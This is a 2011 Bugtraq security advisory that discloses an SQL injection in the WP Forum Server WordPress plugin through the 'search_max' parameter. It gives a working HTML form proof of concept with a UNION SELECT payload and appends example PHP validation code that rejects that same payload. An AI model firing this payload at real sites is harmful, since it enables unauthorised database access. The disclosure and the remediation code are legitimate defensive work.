
List:       bugtraq
Subject:    HTB22851: SQL Injection in WP Forum Server wordpress plugin
From:       advisory () htbridge ! ch
Date:       2011-02-24 11:33:52
Message-ID: 201102241133.p1OBXqWH022247 () htbridge ! ch

Vulnerability ID: HTB22851
Reference: http://www.htbridge.ch/advisory/sql_injection_in_wp_forum_server_wordpress_plugin_1.html
                
Product: WP Forum Server wordpress plugin
Vendor: VastHTML ( http://lucidcrew.com/ ) 
Vulnerable Version: 1.6.5
Vendor Notification: 10 February 2011 
Vulnerability Type: SQL Injection
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists because the "index.php" script fails to properly
sanitize user-supplied input in the "search_max" variable. An attacker can alter
queries to the application SQL database, execute arbitrary queries to the
database, compromise the application, access or modify sensitive data, or
exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


<form action="http://[host]/?page_id=[page_id]&vasthtmlaction=search" method="post" name="main" >
<input type="hidden" name="search_words" value="123" />
<input type="hidden" name="search_submit" value="Search forums" />
<input type="hidden" name="search_user" value="*" />
<input type="hidden" name="search_min" value="0" />
<input type="hidden" name="search_max" value="9999 DAY) union select version(),2,3,4 -- " />
<input type="submit" value="search" name="submit" />
</form>
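
One way to handle "search_min" and "search_max" safely, shown as an added example that is not the plugin's or the advisory's code. The query shape (inferred from the "DAY)" fragment in the PoC), the table and column names, the function names and the MAX_DAYS limit are assumptions.

```php
<?php
// Added example, not the plugin's code. Query shape, table and column names
// are assumptions inferred from the "9999 DAY)" fragment in the PoC.
const MAX_DAYS = 36500; // assumed upper bound for a day-range filter

// Return $raw as an int day count, or null unless it is a plain in-range integer.
function day_bound($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null; // arrays such as search_max[]=1 are rejected
    }
    $n = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => MAX_DAYS],
    ]);
    return $n === false ? null : $n;
}

// Build the statement with placeholders only; values are bound separately.
function build_search(array $post): ?array
{
    $words = $post['search_words'] ?? '';
    $min = day_bound($post['search_min'] ?? null);
    $max = day_bound($post['search_max'] ?? null);
    if (!is_string($words) || $min === null || $max === null || $min > $max) {
        return null; // reject the request instead of running a query
    }
    $sql = 'SELECT id, subject FROM forum_posts'          // hypothetical table
         . ' WHERE `text` LIKE ?'
         . ' AND `date` >= DATE_SUB(NOW(), INTERVAL ? DAY)'
         . ' AND `date` <= DATE_SUB(NOW(), INTERVAL ? DAY)';
    // Escape LIKE wildcards so the search term matches literally.
    $like = '%' . addcslashes($words, '%_\\') . '%';
    return [$sql, [$like, $max, $min]];
}

// Constructed inputs: a normal request, then the search_max value from the PoC.
$ok = build_search(['search_words' => '123', 'search_min' => '0', 'search_max' => '30']);
$bad = build_search(['search_words' => '123', 'search_min' => '0',
    'search_max' => '9999 DAY) union select version(),2,3,4 -- ']);
var_dump($ok !== null, $bad === null);
```

The returned pair is meant for a prepared statement (for example PDO's prepare() and execute()); inside WordPress the same values would go through $wpdb->prepare() with %s and %d placeholders instead of "?".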

